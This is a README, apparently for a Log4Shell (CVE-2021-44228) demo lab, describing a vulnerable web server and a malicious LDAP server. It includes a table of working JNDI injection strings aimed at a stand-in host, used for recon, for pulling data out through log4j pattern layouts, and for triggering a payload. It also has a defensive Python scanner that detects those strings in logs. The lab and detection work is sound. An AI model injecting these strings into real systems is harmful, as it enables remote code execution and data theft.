## https://sploitus.com/exploit?id=E07F3BF4-D40A-54D4-91F2-89A8DA7608C2
# Odysseus

A demo of the Log4Shell ([CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)) vulnerability.

## Build Instructions

The vulnerable webserver and malicious LDAP server were both built and tested on JDK 1.8.0_181.

### Good Guys Web Server

1. Inside `goodguys`, run `gradlew bootJar`
2. Run vulnerable webserver using `java -jar build/libs/goodguys-0.0.1-SNAPSHOT.jar`

### Bad Guys LDAP/Web Server

1. Inside `badguys`, run `mvn package`
2. Run evil server using `java -jar .\target\evil-server.jar`

> Note: Windows Defender may quietly move `target\classes\Exploit.class` to quarantine.

## Evil Payload

The malicious commands are defined inside [Exploit.java](/badguys/src/main/java/Exploit.java#L18).

## Injection Trigger

| Input                                                                    | Remarks                                                                                                   |
| ------------------------------------------------------------------------ | --------------------------------------------------------------------------------------------------------- |
| `${jndi:ldap://evil-server-hostname:389/Recon}`                          | Checks if the target is vulnerable by listening to a connection request to the LDAP server.               |
| `${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)]` | Append any valid log4j pattern layouts to collect the data from target and display in attacker terminal.  |
| `${jndi:ldap://evil-server-hostname:389/Exploit}`                        | Run the payload.                                                                                          |
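
For the defending side, the lookup strings in the table can be spotted in web and application logs. The scanner below is an added example, not part of this repository; the log lines, the `/search` endpoint and the `SearchController` logger name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches the lookup strings from the table above: ${jndi:<scheme>://<host>[:port]/<path>
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:\s}]+)(?::(?P<port>\d+))?/(?P<path>[^\s}]*)",
    re.IGNORECASE,
)

def find_jndi_lookups(line):
    """Return one dict per JNDI lookup string found in a single log line."""
    # Access logs usually record the request percent-encoded, so decode first.
    decoded = unquote(line)
    return [
        {
            "scheme": m["scheme"].lower(),
            "host": m["host"],
            "port": int(m["port"]) if m["port"] else None,
            "path": m["path"],
        }
        for m in JNDI_LOOKUP.finditer(decoded)
    ]

def scan(lines):
    """Return (line_number, hit) pairs for every lookup found in the given lines."""
    return [
        (number, hit)
        for number, line in enumerate(lines, start=1)
        for hit in find_jndi_lookups(line)
    ]

# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Dec/2021:10:01:02 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '198.51.100.9 - - [10/Dec/2021:10:01:07 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fevil-server-hostname%3A389%2FRecon%7D HTTP/1.1" 200 512',
    "2021-12-10 10:01:09 INFO SearchController - query=${jndi:ldap://evil-server-hostname:389/Exploit}",
]

if __name__ == "__main__":
    for number, hit in scan(SAMPLE_LOG):
        print(f"line {number}: {hit['scheme']} lookup to {hit['host']}:{hit['port']} path={hit['path']}")
```

The extracted host and port are the values to pivot on when checking egress or DNS logs for a matching outbound connection from the logging host.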

## References

- https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/
- https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html
- https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/